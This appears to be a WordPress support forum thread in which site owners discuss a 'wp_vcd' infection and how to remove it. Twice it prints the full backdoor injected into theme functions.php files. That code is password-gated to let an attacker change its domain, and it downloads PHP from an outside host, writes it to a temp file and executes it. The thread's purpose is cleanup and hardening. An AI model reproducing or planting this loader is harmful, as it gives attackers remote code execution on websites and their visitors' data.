/tmp/theme_temp_setup what is this

ok so i’ve been hacked!
find this in wp-includes with file name class.wp.php <– delete this!

next look into your functions.php remove all on top codes, and problem fixed!

dont forget to change password.

You need to start working your way through the resources on this page. I’d also suggest reviewing https://ottopress.com/2009/hacked-wordpress-backdoors/

Anything less will probably result in the hacker walking straight back into your site again.

Additional Resources:
Hardening WordPress
https://sitecheck.sucuri.net/scanner/
https://www.unmaskparasites.com/

Hi
I have the same problem.
Can you explain in detail the solve?
@pdku

• This reply was modified 7 years ago by uri70663.

encountered the same, file class.wp.php not. functions.php replaced by new but refuses to work

The instruction has approached, many thanks!

@benderoffspring I have the same problem.
Can you explain in detail the solve?

@ Uri70663

wp-include with the file name class.wp.php <- remove it!

file was not. reinstalled functions.php from the original theme and everything started

@benderoffspring thanks

Am I missing something obvious or are you still hacked? Someone or something has broken into your server and created a rogue file. You really need to consider looking at the sources Esmi posted.

• This reply was modified 7 years ago by Andrew Nevins.

1. Rename your all theme
2. Login your site
3. Active akismet plugin (free)
4. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
5. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{

case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{

if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{

$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}

}
}
}
break;

default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}

die(“”);
}

if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

if($tmpcontent = @file_get_contents(“https://www.spekt.cc/code4.php?i=&#8221;.$path))
{

function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

extract(theme_temp_setup($tmpcontent));
}
}
}

?>
———————————————————————

• This reply was modified 7 years ago by Andrew Nevins.

@esmi @anevins yes im reviewing the link @esmi gave , thank you!

and also remove all /tmp files with name theme_temp_setup

@uri70663 @benderoffspring has made the point ??

Hey guys, just an etiquette thing. Please don’t @ folks who are already in the thread. If they want to subscribe, they will. If they chose not to, then using the @ sends unwanted emails. Thanks…. and back to having so much un-hacking fun!

shakiltorj
Thanks, it’s work for me.
you can say what needs to be done to not repeat this type of attack again?
thanks

• This reply was modified 7 years ago by helloanimation.

Some update
a. Rename your all theme
b. Login your site
c. Active akismet plugin (free)
d. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
e. Go to wp-includes
Delete the following file
1. wp-feed
2. wp-vcd.php
3. class.wp.php
f. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{

case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{

if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{

$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}

}
}
}
break;

default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}

die(“”);
}

if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

if($tmpcontent = @file_get_contents(“https://www.spekt.cc/code4.php?i=”.$path))
{

function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

extract(theme_temp_setup($tmpcontent));
}
}
}

?>
———————————————————————

I was comprimised with this as well.. Thanks for sharing your resolutions!